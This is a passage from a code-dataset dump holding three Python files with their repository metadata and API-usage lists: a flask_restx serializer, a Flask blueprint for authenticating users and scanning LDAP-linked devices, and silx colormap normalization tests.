return [self._remove_additional_fields(data_entry) for data_entry in data]
return self._remove_additional_fields(data)
def serialize(self, obj, *, many: bool = False):
return super(Serializer, self)._serialize(obj, many=many)
def _remove_additional_fields(self, data: dict):
""" Remove fields that aren't provided by user in request """
return {k: v for k, v in data.items() if k in self.declared_fields}
def _get_api_model(self):
""" Map marshmallow schema into flask_restx api model """
model_name = self.model().__name__.replace("Model", "")
rest_attributes = collections.OrderedDict()
for key, value in self.declared_fields.items():
rest_attributes[key] = self.map_marshmallow_field_to_api_field(value)
return flask_restx.Model(model_name, rest_attributes)
@classmethod
def model(cls) -> t.Type[Model]:
""" Expose PynamoDB Model """
return cls.Meta.model
@classmethod
def map_marshmallow_field_to_api_field(cls, marshmallow_field: mf.Field):
if isinstance(marshmallow_field, mf.String):
return frf.String()
if isinstance(marshmallow_field, (mf.Raw, mf.Mapping, mf.Dict)):
return frf.Raw()
if isinstance(marshmallow_field, (mf.List, mf.Tuple)):
return frf.List(cls.map_marshmallow_field_to_api_field(marshmallow_field.inner))
if isinstance(marshmallow_field, (mf.Number, mf.Integer, mf.Decimal, mf.Int)):
return frf.Integer()
if isinstance(marshmallow_field, (mf.Boolean, mf.Bool)):
return frf.Boolean()
if isinstance(marshmallow_field, mf.Float):
return frf.Float()
if isinstance(marshmallow_field, mf.Date):
return frf.Date()
if isinstance(marshmallow_field, mf.DateTime):
return frf.DateTime()
if isinstance(marshmallow_field, (mf.Url, mf.URL)):
return frf.Url()
raise Exception(f"Cannot map {marshmallow_field} to API model field")
def serializer_factory(model_class: t.Type[Model]):
class _Serializer(Serializer):
is_removed = mf.Boolean(default=False)
created_at = mf.Float(allow_none=True)
class Meta:
model = model_class
return _Serializer
|
wizzdev-pl/iot-starter
|
web_server/server/core/serializer.py
|
serializer.py
|
py
| 3,081 |
python
|
en
|
code
| 7 |
github-code
|
6
|
[
{
"api_name": "marshmallow_pynamodb.ModelSchema",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "common.util.create_table",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "collections.OrderedDict",
"line_number": 42,
"usage_type": "call"
},
{
"api_name": "flask_restx.Model",
"line_number": 45,
"usage_type": "call"
},
{
"api_name": "typing.Type",
"line_number": 48,
"usage_type": "attribute"
},
{
"api_name": "model.base_model.Model",
"line_number": 48,
"usage_type": "name"
},
{
"api_name": "marshmallow.fields.Field",
"line_number": 53,
"usage_type": "attribute"
},
{
"api_name": "marshmallow.fields",
"line_number": 53,
"usage_type": "name"
},
{
"api_name": "marshmallow.fields.String",
"line_number": 54,
"usage_type": "attribute"
},
{
"api_name": "marshmallow.fields",
"line_number": 54,
"usage_type": "name"
},
{
"api_name": "flask_restx.fields.String",
"line_number": 55,
"usage_type": "call"
},
{
"api_name": "flask_restx.fields",
"line_number": 55,
"usage_type": "name"
},
{
"api_name": "marshmallow.fields.Raw",
"line_number": 56,
"usage_type": "attribute"
},
{
"api_name": "marshmallow.fields",
"line_number": 56,
"usage_type": "name"
},
{
"api_name": "marshmallow.fields.Mapping",
"line_number": 56,
"usage_type": "attribute"
},
{
"api_name": "marshmallow.fields.Dict",
"line_number": 56,
"usage_type": "attribute"
},
{
"api_name": "flask_restx.fields.Raw",
"line_number": 57,
"usage_type": "call"
},
{
"api_name": "flask_restx.fields",
"line_number": 57,
"usage_type": "name"
},
{
"api_name": "marshmallow.fields.List",
"line_number": 58,
"usage_type": "attribute"
},
{
"api_name": "marshmallow.fields",
"line_number": 58,
"usage_type": "name"
},
{
"api_name": "marshmallow.fields.Tuple",
"line_number": 58,
"usage_type": "attribute"
},
{
"api_name": "flask_restx.fields.List",
"line_number": 59,
"usage_type": "call"
},
{
"api_name": "flask_restx.fields",
"line_number": 59,
"usage_type": "name"
},
{
"api_name": "marshmallow.fields.Number",
"line_number": 60,
"usage_type": "attribute"
},
{
"api_name": "marshmallow.fields",
"line_number": 60,
"usage_type": "name"
},
{
"api_name": "marshmallow.fields.Integer",
"line_number": 60,
"usage_type": "attribute"
},
{
"api_name": "marshmallow.fields.Decimal",
"line_number": 60,
"usage_type": "attribute"
},
{
"api_name": "marshmallow.fields.Int",
"line_number": 60,
"usage_type": "attribute"
},
{
"api_name": "flask_restx.fields.Integer",
"line_number": 61,
"usage_type": "call"
},
{
"api_name": "flask_restx.fields",
"line_number": 61,
"usage_type": "name"
},
{
"api_name": "marshmallow.fields.Boolean",
"line_number": 62,
"usage_type": "attribute"
},
{
"api_name": "marshmallow.fields",
"line_number": 62,
"usage_type": "name"
},
{
"api_name": "marshmallow.fields.Bool",
"line_number": 62,
"usage_type": "attribute"
},
{
"api_name": "flask_restx.fields.Boolean",
"line_number": 63,
"usage_type": "call"
},
{
"api_name": "flask_restx.fields",
"line_number": 63,
"usage_type": "name"
},
{
"api_name": "marshmallow.fields.Float",
"line_number": 64,
"usage_type": "attribute"
},
{
"api_name": "marshmallow.fields",
"line_number": 64,
"usage_type": "name"
},
{
"api_name": "flask_restx.fields.Float",
"line_number": 65,
"usage_type": "call"
},
{
"api_name": "flask_restx.fields",
"line_number": 65,
"usage_type": "name"
},
{
"api_name": "marshmallow.fields.Date",
"line_number": 66,
"usage_type": "attribute"
},
{
"api_name": "marshmallow.fields",
"line_number": 66,
"usage_type": "name"
},
{
"api_name": "flask_restx.fields.Date",
"line_number": 67,
"usage_type": "call"
},
{
"api_name": "flask_restx.fields",
"line_number": 67,
"usage_type": "name"
},
{
"api_name": "marshmallow.fields.DateTime",
"line_number": 68,
"usage_type": "attribute"
},
{
"api_name": "marshmallow.fields",
"line_number": 68,
"usage_type": "name"
},
{
"api_name": "flask_restx.fields.DateTime",
"line_number": 69,
"usage_type": "call"
},
{
"api_name": "flask_restx.fields",
"line_number": 69,
"usage_type": "name"
},
{
"api_name": "marshmallow.fields.Url",
"line_number": 70,
"usage_type": "attribute"
},
{
"api_name": "marshmallow.fields",
"line_number": 70,
"usage_type": "name"
},
{
"api_name": "marshmallow.fields.URL",
"line_number": 70,
"usage_type": "attribute"
},
{
"api_name": "flask_restx.fields.Url",
"line_number": 71,
"usage_type": "call"
},
{
"api_name": "flask_restx.fields",
"line_number": 71,
"usage_type": "name"
},
{
"api_name": "typing.Type",
"line_number": 75,
"usage_type": "attribute"
},
{
"api_name": "model.base_model.Model",
"line_number": 75,
"usage_type": "name"
},
{
"api_name": "marshmallow.fields.Boolean",
"line_number": 77,
"usage_type": "call"
},
{
"api_name": "marshmallow.fields",
"line_number": 77,
"usage_type": "name"
},
{
"api_name": "marshmallow.fields.Float",
"line_number": 78,
"usage_type": "call"
},
{
"api_name": "marshmallow.fields",
"line_number": 78,
"usage_type": "name"
},
{
"api_name": "model.base_model",
"line_number": 81,
"usage_type": "name"
}
] |
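A minimal self-contained sketch of the field-mapping idea used by the serializer above, assuming marshmallow 3.x (where `List` exposes `.inner`) and flask-restx are installed; the `Device` model and its fields are invented for illustration and are not part of the project.
# Hypothetical usage sketch of mapping marshmallow fields to flask-restx fields.
import flask_restx
import flask_restx.fields as frf
import marshmallow.fields as mf

def to_api_field(field):
    if isinstance(field, mf.String):
        return frf.String()
    if isinstance(field, mf.List):
        return frf.List(to_api_field(field.inner))
    if isinstance(field, mf.Integer):
        return frf.Integer()
    raise TypeError(f"No mapping for {field!r}")

device_model = flask_restx.Model("Device", {
    "name": to_api_field(mf.String()),
    "readings": to_api_field(mf.List(mf.Integer())),
})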
7169499809
|
from flask import Blueprint, request, jsonify, abort
from modules.logger import logging
from modules.config import config
import modules.database as Database
import modules.models as Models
import modules.ldap as Ldap
import modules.scanner as Scanner
from modules.tools import get_token,requires_auth,check_auth,calc_hash,no_object_found
views = Blueprint('views', __name__)
@views.route("/login", methods=['GET','POST'])
def login():
"""If Post, Login User. If Get, check if user is authorized"""
if request.method == 'POST':
username = request.headers.get('username')
password = request.headers.get('password')
if Database.check_user(username, calc_hash(password)):
return jsonify({'token': get_token(username)})
else:
return jsonify({'error':'Incorrect Login'}), 401
else:
auth = request.headers.get('Authorization')
if not auth:
return jsonify({'error': 'Auth Token Required'}), 210
elif check_auth(auth):
return jsonify({'message': 'Success'}), 200
else:
return jsonify({'error': 'Auth Token Incorrect'}), 210
@views.route("/users", methods=['GET', 'POST','DELETE'])
@requires_auth
def users():
"""Get, Post and Delete Users"""
if request.method == 'POST':
username = request.headers.get('username')
password = request.headers.get('password')
if username == "admin":
return jsonify({'error': 'Can not modify admin'}), 404
elif username and password:
return jsonify(
Database.update_user(
Models.User(
username=username,
password=calc_hash(password))))
else:
return jsonify({'error': 'Headers not provided'}), 404
elif request.method == 'DELETE':
username = request.headers.get('username')
if username == "admin":
return jsonify({'error': 'Can not modify admin'}), 404
elif username:
return jsonify(
Database.delete_user(
Models.User(
username=username)))
else:
return jsonify({'error': 'Headers not provided'}), 404
else:
users = [u.username for u in Database.get_users() if u.username != "admin"]
return jsonify(users)
@views.route("/devices")
def devices():
"""Get Devices"""
return jsonify(Models.Devices().get_devices_dict())
@views.route("/device/<id>", methods=['GET', 'POST','DELETE'])
@requires_auth
def device(id):
"""Get, Post and Delete a Device"""
device = Models.Device(id=id)
if request.method == 'POST':
device.scan()
device.sync_ldap()
device.update()
return jsonify(device.to_dict())
device.get()
if request.method == 'DELETE':
return jsonify(device.delete()) if device else no_object_found()
else:
return jsonify(device.to_dict()) if device else no_object_found()
@views.route("/locations")
def locations():
"""Get Locations"""
return jsonify(Models.Devices().get_locations())
@views.route("/scan")
def scans():
devices = Models.Devices()
devices.get_devices()
devices.sync_ldap()
devices.scan()
devices.update_devices()
return jsonify(devices.get_devices_dict())
@views.route("/scan/<id>")
def scan(id):
device = Models.Device(id=id)
if device.get() is None:
return no_object_found()
else:
device.sync_ldap()
device.scan()
device.update()
return jsonify(device.to_dict())
@views.route("/history")
def history():
history = Models.Devices().get_history_dict()
return jsonify(history)
@views.route("/history/<id>")
def device_history(id):
history = Models.Device(id=id).get_history_dict()
return jsonify(history) if history else no_object_found()
|
aDrongo/ldap-device-surveyor
|
backend/modules/views.py
|
views.py
|
py
| 4,004 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "flask.Blueprint",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "flask.request.method",
"line_number": 17,
"usage_type": "attribute"
},
{
"api_name": "flask.request",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "flask.request.headers.get",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "flask.request.headers",
"line_number": 18,
"usage_type": "attribute"
},
{
"api_name": "flask.request",
"line_number": 18,
"usage_type": "name"
},
{
"api_name": "flask.request.headers.get",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "flask.request.headers",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "flask.request",
"line_number": 19,
"usage_type": "name"
},
{
"api_name": "modules.database.check_user",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "modules.database",
"line_number": 20,
"usage_type": "name"
},
{
"api_name": "modules.tools.calc_hash",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "flask.jsonify",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "modules.tools.get_token",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "flask.jsonify",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "flask.request.headers.get",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "flask.request.headers",
"line_number": 25,
"usage_type": "attribute"
},
{
"api_name": "flask.request",
"line_number": 25,
"usage_type": "name"
},
{
"api_name": "flask.jsonify",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "modules.tools.check_auth",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "flask.jsonify",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "flask.jsonify",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "flask.request.method",
"line_number": 37,
"usage_type": "attribute"
},
{
"api_name": "flask.request",
"line_number": 37,
"usage_type": "name"
},
{
"api_name": "flask.request.headers.get",
"line_number": 38,
"usage_type": "call"
},
{
"api_name": "flask.request.headers",
"line_number": 38,
"usage_type": "attribute"
},
{
"api_name": "flask.request",
"line_number": 38,
"usage_type": "name"
},
{
"api_name": "flask.request.headers.get",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "flask.request.headers",
"line_number": 39,
"usage_type": "attribute"
},
{
"api_name": "flask.request",
"line_number": 39,
"usage_type": "name"
},
{
"api_name": "flask.jsonify",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "flask.jsonify",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "modules.database.update_user",
"line_number": 44,
"usage_type": "call"
},
{
"api_name": "modules.database",
"line_number": 44,
"usage_type": "name"
},
{
"api_name": "modules.models.User",
"line_number": 45,
"usage_type": "call"
},
{
"api_name": "modules.models",
"line_number": 45,
"usage_type": "name"
},
{
"api_name": "modules.tools.calc_hash",
"line_number": 47,
"usage_type": "call"
},
{
"api_name": "flask.jsonify",
"line_number": 49,
"usage_type": "call"
},
{
"api_name": "flask.request.method",
"line_number": 50,
"usage_type": "attribute"
},
{
"api_name": "flask.request",
"line_number": 50,
"usage_type": "name"
},
{
"api_name": "flask.request.headers.get",
"line_number": 51,
"usage_type": "call"
},
{
"api_name": "flask.request.headers",
"line_number": 51,
"usage_type": "attribute"
},
{
"api_name": "flask.request",
"line_number": 51,
"usage_type": "name"
},
{
"api_name": "flask.jsonify",
"line_number": 53,
"usage_type": "call"
},
{
"api_name": "flask.jsonify",
"line_number": 55,
"usage_type": "call"
},
{
"api_name": "modules.database.delete_user",
"line_number": 56,
"usage_type": "call"
},
{
"api_name": "modules.database",
"line_number": 56,
"usage_type": "name"
},
{
"api_name": "modules.models.User",
"line_number": 57,
"usage_type": "call"
},
{
"api_name": "modules.models",
"line_number": 57,
"usage_type": "name"
},
{
"api_name": "flask.jsonify",
"line_number": 60,
"usage_type": "call"
},
{
"api_name": "modules.database.get_users",
"line_number": 63,
"usage_type": "call"
},
{
"api_name": "modules.database",
"line_number": 63,
"usage_type": "name"
},
{
"api_name": "flask.jsonify",
"line_number": 64,
"usage_type": "call"
},
{
"api_name": "modules.tools.requires_auth",
"line_number": 34,
"usage_type": "name"
},
{
"api_name": "flask.jsonify",
"line_number": 69,
"usage_type": "call"
},
{
"api_name": "modules.models.Devices",
"line_number": 69,
"usage_type": "call"
},
{
"api_name": "modules.models",
"line_number": 69,
"usage_type": "name"
},
{
"api_name": "modules.models.Device",
"line_number": 75,
"usage_type": "call"
},
{
"api_name": "modules.models",
"line_number": 75,
"usage_type": "name"
},
{
"api_name": "flask.request.method",
"line_number": 76,
"usage_type": "attribute"
},
{
"api_name": "flask.request",
"line_number": 76,
"usage_type": "name"
},
{
"api_name": "flask.jsonify",
"line_number": 80,
"usage_type": "call"
},
{
"api_name": "flask.request.method",
"line_number": 82,
"usage_type": "attribute"
},
{
"api_name": "flask.request",
"line_number": 82,
"usage_type": "name"
},
{
"api_name": "flask.jsonify",
"line_number": 83,
"usage_type": "call"
},
{
"api_name": "modules.tools.no_object_found",
"line_number": 83,
"usage_type": "call"
},
{
"api_name": "flask.jsonify",
"line_number": 85,
"usage_type": "call"
},
{
"api_name": "modules.tools.no_object_found",
"line_number": 85,
"usage_type": "call"
},
{
"api_name": "modules.tools.requires_auth",
"line_number": 72,
"usage_type": "name"
},
{
"api_name": "flask.jsonify",
"line_number": 90,
"usage_type": "call"
},
{
"api_name": "modules.models.Devices",
"line_number": 90,
"usage_type": "call"
},
{
"api_name": "modules.models",
"line_number": 90,
"usage_type": "name"
},
{
"api_name": "modules.models.Devices",
"line_number": 94,
"usage_type": "call"
},
{
"api_name": "modules.models",
"line_number": 94,
"usage_type": "name"
},
{
"api_name": "flask.jsonify",
"line_number": 99,
"usage_type": "call"
},
{
"api_name": "modules.models.Device",
"line_number": 103,
"usage_type": "call"
},
{
"api_name": "modules.models",
"line_number": 103,
"usage_type": "name"
},
{
"api_name": "modules.tools.no_object_found",
"line_number": 105,
"usage_type": "call"
},
{
"api_name": "flask.jsonify",
"line_number": 110,
"usage_type": "call"
},
{
"api_name": "modules.models.Devices",
"line_number": 114,
"usage_type": "call"
},
{
"api_name": "modules.models",
"line_number": 114,
"usage_type": "name"
},
{
"api_name": "flask.jsonify",
"line_number": 115,
"usage_type": "call"
},
{
"api_name": "modules.models.Device",
"line_number": 119,
"usage_type": "call"
},
{
"api_name": "modules.models",
"line_number": 119,
"usage_type": "name"
},
{
"api_name": "flask.jsonify",
"line_number": 121,
"usage_type": "call"
},
{
"api_name": "modules.tools.no_object_found",
"line_number": 121,
"usage_type": "call"
},
{
"api_name": "modules.tools.no_object_found",
"line_number": 123,
"usage_type": "call"
}
] |
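The view functions above lean on a `requires_auth` decorator imported from `modules.tools`. A hypothetical simplified version of that pattern might look like the sketch below; the token store, header name, and error payload are assumptions, not the project's actual implementation.
# Hypothetical sketch of a token-checking decorator; not the project's real code.
import functools
from flask import request, jsonify

VALID_TOKENS = {"secret-token"}   # assumption: a static in-memory token store

def requires_auth(view):
    @functools.wraps(view)
    def wrapper(*args, **kwargs):
        token = request.headers.get("Authorization")
        if token not in VALID_TOKENS:
            return jsonify({"error": "Auth Token Incorrect"}), 401
        return view(*args, **kwargs)
    return wrapper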
26113994325
|
__authors__ = ["T. Vincent"]
__license__ = "MIT"
__date__ = "16/05/2018"
import logging
import sys
import numpy
import pytest
from silx.utils.testutils import ParametricTestCase
from silx.math import colormap
_logger = logging.getLogger(__name__)
class TestNormalization(ParametricTestCase):
"""Test silx.math.colormap.Normalization sub classes"""
def _testCodec(self, normalization, rtol=1e-5):
"""Test apply/revert for normalizations"""
test_data = (numpy.arange(1, 10, dtype=numpy.int32),
numpy.linspace(1., 100., 1000, dtype=numpy.float32),
numpy.linspace(-1., 1., 100, dtype=numpy.float32),
1.,
1)
for index in range(len(test_data)):
with self.subTest(normalization=normalization, data_index=index):
data = test_data[index]
normalized = normalization.apply(data, 1., 100.)
result = normalization.revert(normalized, 1., 100.)
self.assertTrue(numpy.array_equal(
numpy.isnan(normalized), numpy.isnan(result)))
if isinstance(data, numpy.ndarray):
notNaN = numpy.logical_not(numpy.isnan(result))
data = data[notNaN]
result = result[notNaN]
self.assertTrue(numpy.allclose(data, result, rtol=rtol))
def testLinearNormalization(self):
"""Test for LinearNormalization"""
normalization = colormap.LinearNormalization()
self._testCodec(normalization)
def testLogarithmicNormalization(self):
"""Test for LogarithmicNormalization"""
normalization = colormap.LogarithmicNormalization()
# relative tolerance is higher because of the log approximation
self._testCodec(normalization, rtol=1e-3)
# Specific extra tests
self.assertTrue(numpy.isnan(normalization.apply(-1., 1., 100.)))
self.assertTrue(numpy.isnan(normalization.apply(numpy.nan, 1., 100.)))
self.assertEqual(normalization.apply(numpy.inf, 1., 100.), numpy.inf)
self.assertEqual(normalization.apply(0, 1., 100.), - numpy.inf)
def testArcsinhNormalization(self):
"""Test for ArcsinhNormalization"""
self._testCodec(colormap.ArcsinhNormalization())
def testSqrtNormalization(self):
"""Test for SqrtNormalization"""
normalization = colormap.SqrtNormalization()
self._testCodec(normalization)
# Specific extra tests
self.assertTrue(numpy.isnan(normalization.apply(-1., 0., 100.)))
self.assertTrue(numpy.isnan(normalization.apply(numpy.nan, 0., 100.)))
self.assertEqual(normalization.apply(numpy.inf, 0., 100.), numpy.inf)
self.assertEqual(normalization.apply(0, 0., 100.), 0.)
class TestColormap(ParametricTestCase):
"""Test silx.math.colormap.cmap"""
NORMALIZATIONS = (
'linear',
'log',
'arcsinh',
'sqrt',
colormap.LinearNormalization(),
colormap.LogarithmicNormalization(),
colormap.GammaNormalization(2.),
colormap.GammaNormalization(0.5))
@staticmethod
def ref_colormap(data, colors, vmin, vmax, normalization, nan_color):
"""Reference implementation of colormap
:param numpy.ndarray data: Data to convert
:param numpy.ndarray colors: Color look-up-table
:param float vmin: Lower bound of the colormap range
:param float vmax: Upper bound of the colormap range
:param str normalization: Normalization to use
:param Union[numpy.ndarray, None] nan_color: Color to use for NaN
"""
norm_functions = {'linear': lambda v: v,
'log': numpy.log10,
'arcsinh': numpy.arcsinh,
'sqrt': numpy.sqrt}
if isinstance(normalization, str):
norm_function = norm_functions[normalization]
else:
def norm_function(value):
return normalization.apply(value, vmin, vmax)
with numpy.errstate(divide='ignore', invalid='ignore'):
# Ignore divide by zero and invalid value encountered in log10, sqrt
norm_data, vmin, vmax = map(norm_function, (data, vmin, vmax))
if normalization == 'arcsinh' and sys.platform == 'win32':
# There is a difference in the behavior of numpy.arcsinh
# between Windows and other OSes for infinite values.
# This makes Windows behave like Linux and macOS.
norm_data[data == numpy.inf] = numpy.inf
norm_data[data == -numpy.inf] = -numpy.inf
nb_colors = len(colors)
scale = nb_colors / (vmax - vmin)
# Subtraction must be done in float to avoid overflow with uint
indices = numpy.clip(scale * (norm_data - float(vmin)),
0, nb_colors - 1)
indices[numpy.isnan(indices)] = nb_colors # Use an extra index for NaN
indices = indices.astype('uint')
# Add NaN color to array
if nan_color is None:
nan_color = (0,) * colors.shape[-1]
colors = numpy.append(colors, numpy.atleast_2d(nan_color), axis=0)
return colors[indices]
def _test(self, data, colors, vmin, vmax, normalization, nan_color):
"""Run test of colormap against alternative implementation
:param numpy.ndarray data: Data to convert
:param numpy.ndarray colors: Color look-up-table
:param float vmin: Lower bound of the colormap range
:param float vmax: Upper bound of the colormap range
:param str normalization: Normalization to use
:param Union[numpy.ndarray, None] nan_color: Color to use for NaN
"""
image = colormap.cmap(
data, colors, vmin, vmax, normalization, nan_color)
ref_image = self.ref_colormap(
data, colors, vmin, vmax, normalization, nan_color)
self.assertTrue(numpy.allclose(ref_image, image))
self.assertEqual(image.dtype, colors.dtype)
self.assertEqual(image.shape, data.shape + (colors.shape[-1],))
def test(self):
"""Test all dtypes with finite data
Test all supported types and endianness
"""
colors = numpy.zeros((256, 4), dtype=numpy.uint8)
colors[:, 0] = numpy.arange(len(colors))
colors[:, 3] = 255
# Generates (u)int and floats types
dtypes = [e + k + i for e in '<>' for k in 'uif' for i in '1248'
if k != 'f' or i != '1']
dtypes.append(numpy.dtype(numpy.longdouble).name) # Add long double
for normalization in self.NORMALIZATIONS:
for dtype in dtypes:
with self.subTest(dtype=dtype, normalization=normalization):
_logger.info('normalization: %s, dtype: %s',
normalization, dtype)
data = numpy.arange(-5, 15).astype(dtype).reshape(4, 5)
self._test(data, colors, 1, 10, normalization, None)
def test_not_finite(self):
"""Test float data with not finite values"""
colors = numpy.zeros((256, 4), dtype=numpy.uint8)
colors[:, 0] = numpy.arange(len(colors))
colors[:, 3] = 255
test_data = { # message: data
'no finite values': (float('inf'), float('-inf'), float('nan')),
'only NaN': (float('nan'), float('nan'), float('nan')),
'mix finite/not finite': (float('inf'), float('-inf'), 1., float('nan')),
}
for normalization in self.NORMALIZATIONS:
for msg, data in test_data.items():
with self.subTest(msg, normalization=normalization):
_logger.info('normalization: %s, %s', normalization, msg)
data = numpy.array(data, dtype=numpy.float64)
self._test(data, colors, 1, 10, normalization, (0, 0, 0, 0))
def test_errors(self):
"""Test raising exception for bad vmin, vmax, normalization parameters
"""
colors = numpy.zeros((256, 4), dtype=numpy.uint8)
colors[:, 0] = numpy.arange(len(colors))
colors[:, 3] = 255
data = numpy.arange(10, dtype=numpy.float64)
test_params = [ # (vmin, vmax, normalization)
(-1., 2., 'log'),
(0., 1., 'log'),
(1., 0., 'log'),
(-1., 1., 'sqrt'),
(1., -1., 'sqrt'),
]
for vmin, vmax, normalization in test_params:
with self.subTest(
vmin=vmin, vmax=vmax, normalization=normalization):
_logger.info('normalization: %s, range: [%f, %f]',
normalization, vmin, vmax)
with self.assertRaises(ValueError):
self._test(data, colors, vmin, vmax, normalization, None)
def test_apply_colormap():
"""Basic test of silx.math.colormap.apply_colormap"""
data = numpy.arange(256)
expected_colors = numpy.empty((256, 4), dtype=numpy.uint8)
expected_colors[:, :3] = numpy.arange(256, dtype=numpy.uint8).reshape(256, 1)
expected_colors[:, 3] = 255
colors = colormap.apply_colormap(
data,
colormap="gray",
norm="linear",
autoscale="minmax",
vmin=None,
vmax=None,
gamma=1.0)
assert numpy.array_equal(colors, expected_colors)
testdata_normalize = [
(numpy.arange(512), numpy.arange(512) // 2, 0, 511),
((numpy.nan, numpy.inf, -numpy.inf), (0, 255, 0), 0, 1),
((numpy.nan, numpy.inf, -numpy.inf, 1), (0, 255, 0, 0), 1, 1),
]
@pytest.mark.parametrize(
"data,expected_data,expected_vmin,expected_vmax",
testdata_normalize,
)
def test_normalize(data, expected_data, expected_vmin, expected_vmax):
"""Basic test of silx.math.colormap.normalize"""
result = colormap.normalize(
numpy.asarray(data),
norm="linear",
autoscale="minmax",
vmin=None,
vmax=None,
gamma=1.0,
)
assert result.vmin == expected_vmin
assert result.vmax == expected_vmax
assert numpy.array_equal(
result.data,
numpy.asarray(expected_data, dtype=numpy.uint8),
)
|
silx-kit/silx
|
src/silx/math/test/test_colormap.py
|
test_colormap.py
|
py
| 10,291 |
python
|
en
|
code
| 106 |
github-code
|
6
|
[
{
"api_name": "logging.getLogger",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "silx.utils.testutils.ParametricTestCase",
"line_number": 19,
"usage_type": "name"
},
{
"api_name": "numpy.arange",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "numpy.int32",
"line_number": 24,
"usage_type": "attribute"
},
{
"api_name": "numpy.linspace",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "numpy.float32",
"line_number": 25,
"usage_type": "attribute"
},
{
"api_name": "numpy.linspace",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "numpy.float32",
"line_number": 26,
"usage_type": "attribute"
},
{
"api_name": "numpy.array_equal",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "numpy.isnan",
"line_number": 37,
"usage_type": "call"
},
{
"api_name": "numpy.ndarray",
"line_number": 39,
"usage_type": "attribute"
},
{
"api_name": "numpy.logical_not",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "numpy.isnan",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "numpy.allclose",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "silx.math.colormap.LinearNormalization",
"line_number": 47,
"usage_type": "call"
},
{
"api_name": "silx.math.colormap",
"line_number": 47,
"usage_type": "name"
},
{
"api_name": "silx.math.colormap.LogarithmicNormalization",
"line_number": 52,
"usage_type": "call"
},
{
"api_name": "silx.math.colormap",
"line_number": 52,
"usage_type": "name"
},
{
"api_name": "numpy.isnan",
"line_number": 57,
"usage_type": "call"
},
{
"api_name": "numpy.isnan",
"line_number": 58,
"usage_type": "call"
},
{
"api_name": "numpy.nan",
"line_number": 58,
"usage_type": "attribute"
},
{
"api_name": "numpy.inf",
"line_number": 59,
"usage_type": "attribute"
},
{
"api_name": "numpy.inf",
"line_number": 60,
"usage_type": "attribute"
},
{
"api_name": "silx.math.colormap.ArcsinhNormalization",
"line_number": 64,
"usage_type": "call"
},
{
"api_name": "silx.math.colormap",
"line_number": 64,
"usage_type": "name"
},
{
"api_name": "silx.math.colormap.SqrtNormalization",
"line_number": 68,
"usage_type": "call"
},
{
"api_name": "silx.math.colormap",
"line_number": 68,
"usage_type": "name"
},
{
"api_name": "numpy.isnan",
"line_number": 72,
"usage_type": "call"
},
{
"api_name": "numpy.isnan",
"line_number": 73,
"usage_type": "call"
},
{
"api_name": "numpy.nan",
"line_number": 73,
"usage_type": "attribute"
},
{
"api_name": "numpy.inf",
"line_number": 74,
"usage_type": "attribute"
},
{
"api_name": "silx.utils.testutils.ParametricTestCase",
"line_number": 78,
"usage_type": "name"
},
{
"api_name": "silx.math.colormap.LinearNormalization",
"line_number": 86,
"usage_type": "call"
},
{
"api_name": "silx.math.colormap",
"line_number": 86,
"usage_type": "name"
},
{
"api_name": "silx.math.colormap.LogarithmicNormalization",
"line_number": 87,
"usage_type": "call"
},
{
"api_name": "silx.math.colormap",
"line_number": 87,
"usage_type": "name"
},
{
"api_name": "silx.math.colormap.GammaNormalization",
"line_number": 88,
"usage_type": "call"
},
{
"api_name": "silx.math.colormap",
"line_number": 88,
"usage_type": "name"
},
{
"api_name": "silx.math.colormap.GammaNormalization",
"line_number": 89,
"usage_type": "call"
},
{
"api_name": "silx.math.colormap",
"line_number": 89,
"usage_type": "name"
},
{
"api_name": "numpy.log10",
"line_number": 103,
"usage_type": "attribute"
},
{
"api_name": "numpy.arcsinh",
"line_number": 104,
"usage_type": "attribute"
},
{
"api_name": "numpy.sqrt",
"line_number": 105,
"usage_type": "attribute"
},
{
"api_name": "numpy.errstate",
"line_number": 113,
"usage_type": "call"
},
{
"api_name": "sys.platform",
"line_number": 117,
"usage_type": "attribute"
},
{
"api_name": "numpy.inf",
"line_number": 121,
"usage_type": "attribute"
},
{
"api_name": "numpy.inf",
"line_number": 122,
"usage_type": "attribute"
},
{
"api_name": "numpy.clip",
"line_number": 128,
"usage_type": "call"
},
{
"api_name": "numpy.isnan",
"line_number": 130,
"usage_type": "call"
},
{
"api_name": "numpy.append",
"line_number": 136,
"usage_type": "call"
},
{
"api_name": "numpy.atleast_2d",
"line_number": 136,
"usage_type": "call"
},
{
"api_name": "silx.math.colormap.cmap",
"line_number": 150,
"usage_type": "call"
},
{
"api_name": "silx.math.colormap",
"line_number": 150,
"usage_type": "name"
},
{
"api_name": "numpy.allclose",
"line_number": 156,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 165,
"usage_type": "call"
},
{
"api_name": "numpy.uint8",
"line_number": 165,
"usage_type": "attribute"
},
{
"api_name": "numpy.arange",
"line_number": 166,
"usage_type": "call"
},
{
"api_name": "numpy.dtype",
"line_number": 172,
"usage_type": "call"
},
{
"api_name": "numpy.longdouble",
"line_number": 172,
"usage_type": "attribute"
},
{
